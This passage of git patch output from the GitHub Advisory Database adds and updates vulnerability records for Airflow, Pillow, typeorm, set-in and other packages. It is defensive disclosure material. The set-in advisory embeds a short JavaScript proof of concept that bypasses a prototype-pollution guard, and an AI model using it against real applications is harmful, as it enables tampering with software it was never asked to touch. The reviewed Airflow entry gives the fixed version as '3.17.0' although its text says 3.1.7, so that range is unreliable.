b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json new file mode 100644 index 0000000000000..8c5e98ce1e6a9 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm44-x5x7-24c4", + "modified": "2026-02-11T21:40:07Z", + "published": "2026-02-09T12:30:22Z", + "aliases": [ + "CVE-2026-22922" + ], + "summary": "Apache Airflow Has an Authorization Bypass That Allows Unauthorized Task Log Access", + "details": "## Vulnerability Overview\n\nAn authorization bypass vulnerability exists in Apache Airflow that allows authenticated users to access task execution logs without the required permissions.\n\n## The Flaw\n\nThe vulnerability affects environments using custom roles or granular permission settings. Normally, Airflow allows administrators to separate \"Task\" access (viewing the task state) from \"Task Log\" access (viewing the console output/logs).\n\nIn affected versions, the permission check for retrieving logs is insufficient. An authenticated user who has been granted access to view Tasks can successfully request and view Task Logs, even if they do not have the specific `can_read` permission for Logs.\n\n## Impact\n\n- **Confidentiality Loss:** Task logs often contain sensitive operational data, debugging information, or potentially leaked secrets (environment variables, connection strings) that should not be visible to all users with basic task access.\n- **Broken Access Control:** This bypasses the intended security model for restricted user roles.\n\n## Affected Versions\n\n- Apache Airflow 3.1.0 through 3.1.6\n\n## Patches\n\nUsers should upgrade to Apache Airflow **3.1.7** or later, which enforces the correct permission checks for log access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "apache-airflow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.17.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22922" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/60412" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/airflow" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/gdb7vffhpmrj5hp1j0oj1j13o4vmsq40" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-648" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T21:40:06Z", + "nvd_published_at": "2026-02-09T11:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json b/advisories/unreviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json deleted file mode 100644 index e1cf0f1fa774b..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-5g2w-9f8g-g5q7/GHSA-5g2w-9f8g-g5q7.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5g2w-9f8g-g5q7", - "modified": "2026-02-09T12:30:22Z", - "published": "2026-02-09T12:30:22Z", - "aliases": [ - "CVE-2026-24098" - ], - "details": "Apache Airflow versions before 3.1.7, has vulnerability that allows authenticated UI users with permission to one or more specific Dags to view import errors generated by other Dags they did not have access to. \n\nUsers are advised to upgrade to 3.1.7 or later, which resolves this issue", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24098" - }, - { - "type": "WEB", - "url": "https://github.com/apache/airflow/pull/60801" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/nx96435v77xdst7ls5lk57kqvqyj095x" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T11:16:14Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json b/advisories/unreviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json deleted file mode 100644 index 594168f8d2b1b..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pm44-x5x7-24c4", - "modified": "2026-02-09T12:30:22Z", - "published": "2026-02-09T12:30:22Z", - "aliases": [ - "CVE-2026-22922" - ], - "details": "Apache Airflow versions 3.1.0 through 3.1.6 contain an authorization flaw that can allow an authenticated user with custom permissions limited to task access to view task logs without having task log access. \n\nUsers are recommended to upgrade to Apache Airflow 3.1.7 or later, which resolves this issue.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22922" - }, - { - "type": "WEB", - "url": "https://github.com/apache/airflow/pull/60412" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/gdb7vffhpmrj5hp1j0oj1j13o4vmsq40" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-648" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T11:16:13Z" - } -} \ No newline at end of file From 35c6994870d0152d6935228e5382337c5bdc0190 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 21:56:05 +0000 Subject: [PATCH 020/215] Publish GHSA-52rh-5rpj-c3w6 --- .../GHSA-52rh-5rpj-c3w6.json | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json b/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json index 0f6a0ef977880..5cb0b96a625d0 100644 --- a/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json +++ b/advisories/github-reviewed/2022/05/GHSA-52rh-5rpj-c3w6/GHSA-52rh-5rpj-c3w6.json @@ -1,12 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-52rh-5rpj-c3w6", - "modified": "2022-05-05T16:00:50Z", + "modified": "2026-02-11T21:54:44Z", "published": "2022-05-05T16:00:50Z", "aliases": [], "summary": "Improper handling of multiline messages in node-irc", "details": "node-irc is a socket wrapper for the IRC protocol that extends Node.js' EventEmitter. The vulnerability allows an attacker to manipulate a Matrix user into executing IRC commands by having them reply to a maliciously crafted message. Incorrect handling of a CR character allowed for making part of the message be sent to the IRC server verbatim rather than as a message to the channel.\nThe vulnerability has been patched in node-irc version 1.2.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -36,6 +41,10 @@ "type": "WEB", "url": "https://github.com/matrix-org/node-irc/security/advisories/GHSA-52rh-5rpj-c3w6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29166" + }, { "type": "WEB", "url": "https://github.com/matrix-org/node-irc/commit/2976c856df37660a9d664e94c857c796de2e34f7" @@ -54,7 +63,10 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-74", + "CWE-93" + ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-05-05T16:00:50Z", From 7b353fe93acacc6ce6815a9594dac897b5dadaf8 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 22:07:13 +0000 Subject: [PATCH 021/215] Publish GHSA-w7q7-vjp8-7jv4 --- .../GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json b/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json index 370e7fde573b9..fdca58b905280 100644 --- a/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json +++ b/advisories/github-reviewed/2019/06/GHSA-w7q7-vjp8-7jv4/GHSA-w7q7-vjp8-7jv4.json @@ -1,12 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w7q7-vjp8-7jv4", - "modified": "2020-08-31T18:36:13Z", + "modified": "2026-02-11T22:05:23Z", "published": "2019-06-06T15:30:16Z", "aliases": [], "summary": "SQL Injection in typeorm", "details": "Versions of `typeorm` before 0.1.15 are vulnerable to SQL Injection. Field names are not properly validated allowing attackers to inject SQL statements and execute arbitrary SQL queries.\n\n\n## Recommendation\n\nUpgrade to version 0.1.15", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -37,6 +42,10 @@ "type": "WEB", "url": "https://hackerone.com/reports/319458" }, + { + "type": "PACKAGE", + "url": "https://github.com/typeorm/typeorm" + }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/800" @@ -46,7 +55,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2019-06-05T21:25:43Z", "nvd_published_at": null From 3311826e59acd2a22664deace01ce4df8f80602b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 22:29:21 +0000 Subject: [PATCH 022/215] Publish GHSA-vmhw-fhj6-m3g5 --- .../05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json b/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json index 973d93994f746..5654c7e079d4f 100644 --- a/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json +++ b/advisories/github-reviewed/2019/05/GHSA-vmhw-fhj6-m3g5/GHSA-vmhw-fhj6-m3g5.json @@ -1,12 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vmhw-fhj6-m3g5", - "modified": "2020-08-31T18:31:33Z", + "modified": "2026-02-11T22:27:32Z", "published": "2019-05-31T23:46:33Z", "aliases": [], "summary": "Path Traversal in angular-http-server", "details": "Versions of `angular-http-server` before 1.4.4 are vulnerable to path traversal.\n\n\n## Recommendation\n\nUpdate to version 1.4.4 or later.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [ { "package": { @@ -37,6 +42,10 @@ "type": "WEB", "url": "https://hackerone.com/reports/330349" }, + { + "type": "PACKAGE", + "url": "https://github.com/simonh1000/angular-http-server" + }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/656" From e73006ae8a16267c2a926340613a6f62867fc5b5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 23:15:12 +0000 Subject: [PATCH 023/215] Publish Advisories GHSA-37qj-frw5-hhjh GHSA-2c4m-g7rx-63q7 GHSA-33mh-2634-fwr2 GHSA-ff9r-ww9c-43x8 GHSA-gwmx-9gcj-332h GHSA-m4g2-2q66-vc9v --- .../GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json | 3 ++- .../GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json | 6 ++++-- .../GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json | 6 +++++- .../GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json | 12 ++++++++++-- .../GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json | 8 ++++++-- .../GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json | 15 ++++++++++++--- 6 files changed, 39 insertions(+), 11 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json b/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json index 9b6376aee0688..e4e0889d25d6e 100644 --- a/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json +++ b/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-37qj-frw5-hhjh", - "modified": "2026-02-11T18:38:19Z", + "modified": "2026-02-11T23:13:02Z", "published": "2026-01-30T20:10:14Z", "aliases": [ "CVE-2026-25128" @@ -62,6 +62,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-20", "CWE-248" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json b/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json index f6fc4a7483fbe..0ea35ff4ebdc0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json +++ b/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-2c4m-g7rx-63q7", - "modified": "2026-02-11T15:13:28Z", + "modified": "2026-02-11T23:12:52Z", "published": "2026-02-11T15:13:28Z", - "aliases": [], + "aliases": [ + "CVE-2026-26021" + ], "summary": "set-in Affected by Prototype Pollution", "details": "### Summary\nA prototype pollution vulnerability exists in the the npm package set-in (>=2.0.1). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. This has been fixed in version 2.0.5.\n\n### Details\nThe vulnerability resides in line 28 of https://github.com/ahdinosaur/set-in/blob/master/index.js where includes() function is used to check whether user provided input contain forbidden strings.\n\n### PoC\n#### Steps to reproduce\n1. Install latest version of set-in using npm install or cloning from git\n2. Run the following code snippet:\n\n```javascript\nArray.prototype.includes = () => false; \nconst si = require('set-in');\nconst obj = {};\nconsole.log({}.polluted);\nsi(obj, [\n 'constructor',\n 'prototype',\n 'polluted'\n], 'yes');\nconsole.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred\n```\n\n#### Expected behavior\nPrototype pollution should be prevented and {} should not gain new properties.\nThis should be printed on the console:\n```\nundefined\nundefined OR throw an Error\n```\n\n#### Actual behavior\nObject.prototype is polluted\nThis is printed on the console:\n```\nundefined \nyes\n```\n\n### Impact\nThis is a prototype pollution vulnerability, which can have severe security implications depending on how set-in is used by downstream applications. Any application that processes attacker-controlled input using this package may be affected.\nIt could potentially lead to the following problems:\n1. Authentication bypass\n2. Denial of service\n3. Remote code execution (if polluted property is passed to sinks like eval or child_process)", "severity": [ diff --git a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json index de270d48f1290..82010503afab6 100644 --- a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json +++ b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33mh-2634-fwr2", - "modified": "2026-02-09T22:39:44Z", + "modified": "2026-02-11T23:13:21Z", "published": "2026-02-09T20:37:05Z", "aliases": [ "CVE-2026-25765" @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://github.com/lostisland/faraday/releases/tag/v2.14.1" }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-25765.yml" + }, { "type": "WEB", "url": "https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2" diff --git a/advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json b/advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json index fce660056e3a7..9a80edb460f90 100644 --- a/advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json +++ b/advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ff9r-ww9c-43x8", - "modified": "2026-02-11T18:17:59Z", + "modified": "2026-02-11T23:14:14Z", "published": "2026-02-11T18:17:58Z", "aliases": [ "CVE-2026-25759" @@ -40,6 +40,14 @@ "type": "WEB", "url": "https://github.com/statamic/cms/security/advisories/GHSA-ff9r-ww9c-43x8" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25759" + }, + { + "type": "WEB", + "url": "https://github.com/statamic/cms/commit/6ed4f65f3387686d6dbd816e9b4f18a8d9736ff6" + }, { "type": "PACKAGE", "url": "https://github.com/statamic/cms" @@ -56,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-11T18:17:58Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T21:16:19Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json b/advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json index 3f0e4f4840911..5f24b53ff1a8c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json +++ b/advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gwmx-9gcj-332h", - "modified": "2026-02-11T16:53:35Z", + "modified": "2026-02-11T23:14:08Z", "published": "2026-02-11T16:53:35Z", "aliases": [ "CVE-2026-25633" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/statamic/cms/security/advisories/GHSA-gwmx-9gcj-332h" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25633" + }, { "type": "WEB", "url": "https://github.com/statamic/cms/pull/13883" @@ -87,6 +91,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-11T16:53:35Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T21:16:18Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json b/advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json index 29fc506b3faa3..875deb543ec85 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json +++ b/advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m4g2-2q66-vc9v", - "modified": "2026-02-11T18:39:34Z", + "modified": "2026-02-11T23:14:19Z", "published": "2026-02-11T18:39:34Z", "aliases": [ "CVE-2026-25935" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-m4g2-2q66-vc9v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25935" + }, { "type": "WEB", "url": "https://github.com/go-vikunja/vikunja/commit/dd0b82f00a8c9ded1c19a1e643a197c514be6d37" @@ -51,15 +55,20 @@ { "type": "WEB", "url": "https://github.com/go-vikunja/vikunja/releases/tag/v1.1.0" + }, + { + "type": "WEB", + "url": "https://vikunja.io/changelog/vikunja-v1.1.0-was-released" } ], "database_specific": { "cwe_ids": [ - "CWE-79" + "CWE-79", + "CWE-80" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-11T18:39:34Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T21:16:20Z" } } \ No newline at end of file From 61bb77f1fdfd9d9aeabe796883ddd06babf8020d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 23:18:48 +0000 Subject: [PATCH 024/215] Publish Advisories GHSA-9f3f-wv7r-qc8r GHSA-cfh3-3jmp-rvhc GHSA-pqqf-7hxm-rj5r --- .../GHSA-9f3f-wv7r-qc8r.json | 12 ++++++++++-- .../GHSA-cfh3-3jmp-rvhc.json | 19 ++++++++++++++++--- .../GHSA-pqqf-7hxm-rj5r.json | 8 ++++++-- 3 files changed, 32 insertions(+), 7 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json index f0e3eea3bddff..9d5dd79b61f87 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json +++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9f3f-wv7r-qc8r", - "modified": "2026-02-11T19:30:08Z", + "modified": "2026-02-11T23:14:59Z", "published": "2026-02-11T15:13:12Z", "aliases": [ "CVE-2026-26014" @@ -78,6 +78,10 @@ "type": "WEB", "url": "https://github.com/pion/dtls/security/advisories/GHSA-9f3f-wv7r-qc8r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26014" + }, { "type": "WEB", "url": "https://github.com/pion/dtls/pull/796" @@ -89,6 +93,10 @@ { "type": "PACKAGE", "url": "https://github.com/pion/dtls" + }, + { + "type": "WEB", + "url": "https://github.com/pion/dtls/releases/tag/v3.1.0" } ], "database_specific": { @@ -98,6 +106,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-11T15:13:12Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T21:16:21Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json b/advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json index 8b699f1a7b257..78e7172a1c60e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json +++ b/advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-cfh3-3jmp-rvhc", - "modified": "2026-02-11T14:22:50Z", + "modified": "2026-02-11T23:14:48Z", "published": "2026-02-11T14:22:50Z", "aliases": [ "CVE-2026-25990" ], "summary": "Pillow affected by out-of-bounds write when loading PSD images", "details": "### Impact\nAn out-of-bounds write may be triggered when loading a specially crafted PSD image. Pillow >= 10.3.0 users are affected.\n\n### Patches\nPillow 12.1.1 will be released shortly with a fix for this.\n\n### Workarounds\n`Image.open()` has a `formats` parameter that can be used to prevent PSD images from being opened.\n\n### References\nPillow 12.1.1 will add release notes at https://pillow.readthedocs.io/en/stable/releasenotes/index.html", - "severity": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], "affected": [ { "package": { @@ -35,6 +40,10 @@ "type": "WEB", "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990" + }, { "type": "WEB", "url": "https://github.com/python-pillow/Pillow/pull/9427" @@ -43,6 +52,10 @@ "type": "WEB", "url": "https://github.com/python-pillow/Pillow/commit/54ba4db542ad3c7b918812a4e2d69c27735a3199" }, + { + "type": "WEB", + "url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa" + }, { "type": "PACKAGE", "url": "https://github.com/python-pillow/Pillow" @@ -59,6 +72,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-11T14:22:50Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T21:16:20Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json b/advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json index 904c850827311..3bcbd0c485b5e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json +++ b/advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pqqf-7hxm-rj5r", - "modified": "2026-02-11T14:23:02Z", + "modified": "2026-02-11T23:14:53Z", "published": "2026-02-11T14:23:02Z", "aliases": [ "CVE-2026-26010" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-pqqf-7hxm-rj5r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26010" + }, { "type": "PACKAGE", "url": "https://github.com/open-metadata/OpenMetadata" @@ -56,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-11T14:23:02Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-11T21:16:21Z" } } \ No newline at end of file From 37873dbd56e49ace4588c9abadb798392eb5a564 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 00:32:50 +0000 Subject: [PATCH 025/215] Advisory Database Sync --- .../GHSA-5pvc-qgx7-mhr5.json | 6 +- .../GHSA-6fjf-g26h-9mff.json | 6 +- .../GHSA-9c4h-xhg9-x3gj.json | 6 +- .../GHSA-25q2-mm9v-fcj8.json | 37 ++++++++++++ .../GHSA-26vr-h5vf-58cq.json | 29 ++++++++++ .../GHSA-2cmj-fc9r-6h5j.json | 37 ++++++++++++ .../GHSA-2hr4-372m-m24q.json | 41 +++++++++++++ .../GHSA-2jp6-x3f3-3m72.json | 45 +++++++++++++++ .../GHSA-2jw9-xm3m-75jh.json | 37 ++++++++++++ .../GHSA-2vhc-whvm-6f6g.json | 57 +++++++++++++++++++ .../GHSA-355c-f243-w6f5.json | 29 ++++++++++ .../GHSA-366r-6rjw-f277.json | 29 ++++++++++ .../GHSA-3993-26cm-wfhm.json | 33 +++++++++++ .../GHSA-3cgw-cpcx-p7g4.json | 29 ++++++++++ .../GHSA-3fcr-xq7p-rffp.json | 29 ++++++++++ .../GHSA-3frw-32pg-5m86.json | 57 +++++++++++++++++++ .../GHSA-3jj8-9qpj-6989.json | 37 ++++++++++++ .../GHSA-3p5c-6wpr-gh3w.json | 33 +++++++++++ .../GHSA-3qr2-wf7p-c9f8.json | 57 +++++++++++++++++++ .../GHSA-3ww4-528c-xcv7.json | 29 ++++++++++ .../GHSA-4m8q-p6h8-x2wj.json | 45 +++++++++++++++ .../GHSA-4q59-wccf-6q9r.json | 49 ++++++++++++++++ .../GHSA-5fwp-233p-3m7m.json | 45 +++++++++++++++ .../GHSA-649p-9q32-vwxc.json | 29 ++++++++++ .../GHSA-6cwx-3f6w-m5ch.json | 56 ++++++++++++++++++ .../GHSA-6jg9-x4w8-gj7j.json | 29 ++++++++++ .../GHSA-6xrf-46c8-4wmj.json | 41 +++++++++++++ .../GHSA-74vw-h65p-vr44.json | 41 +++++++++++++ .../GHSA-82p2-ccrf-wxw5.json | 41 +++++++++++++ .../GHSA-84wm-58x3-8fvc.json | 29 ++++++++++ .../GHSA-8cmp-jqmx-pj7w.json | 41 +++++++++++++ .../GHSA-8xrx-9wj4-6775.json | 41 +++++++++++++ .../GHSA-926h-3qgq-9w39.json | 33 +++++++++++ .../GHSA-934f-cmh4-43m7.json | 57 +++++++++++++++++++ .../GHSA-946c-234f-fccx.json | 49 ++++++++++++++++ .../GHSA-9677-7r6g-3qh2.json | 29 ++++++++++ .../GHSA-96rf-whf9-r5vh.json | 29 ++++++++++ 